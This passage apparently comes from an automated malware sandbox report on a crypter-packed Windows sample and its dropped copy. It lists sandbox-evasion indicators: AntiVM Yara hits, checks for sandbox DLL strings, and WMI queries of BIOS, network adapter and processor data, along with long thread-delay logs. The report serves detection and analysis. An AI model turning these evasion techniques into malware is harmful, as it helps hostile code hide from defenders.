              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 4748Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -23980767295822402s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -100000s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1572Thread sleep count: 9837 > 30
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99859s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99734s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99623s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99500s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99388s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99252s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99130s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99000s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98888s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98779s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98671s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98558s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98406s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98281s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98164s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98047s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97937s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97828s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97719s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97608s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97500s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97387s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97250s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97140s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97031s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96918s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96750s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96624s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96514s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96406s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96294s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96186s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96078s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95968s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95859s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95750s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95640s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95530s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95422s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95310s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95187s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95078s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94969s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94812s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94703s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94593s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94484s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 3476Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -19369081277395017s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -100000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 4636Thread sleep count: 9758 > 30
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99764s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99546s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99323s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99218s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99109s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -99000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98725s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98604s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98484s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98296s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98186s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -98053s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97893s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97735s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97594s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97454s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97297s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -97151s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -96085s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -95901s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93632s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93516s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93344s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -93089s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92977s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92766s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92547s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92328s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92219s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080Thread sleep time: -92109s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWindow / User API: threadDelayed 9837
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWindow / User API: threadDelayed 9758
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 100000
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99859
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99734
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99623
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99500
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99388
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99252
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99130
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 99000
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98888
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98779
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98671
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98558
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98406
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98281
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98164
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 98047
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97937
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97828
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97719
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97608
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97500
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97387
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97250
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97140
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 97031
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96918
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96750
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96624
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96514
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96406
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96294
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96186
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 96078
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95968
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95859
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95750
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95640
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95530
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95422
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95310
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95187
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 95078
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94969
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94812
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94703
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94593
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeThread delayed: delay time: 94484
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 100000
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99875
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99764
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99656
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99546
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99437
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99323
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99218
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99109
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 99000
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98890
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98725
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98604
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98484
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98296
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98186
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 98053
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97893
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97735
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97594
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97454
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97297
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 97151
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 96085
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 95901
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93632
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93516
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93344
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93203
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 93089
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92977
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92875
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92766
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92656
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92547
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92437
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92328
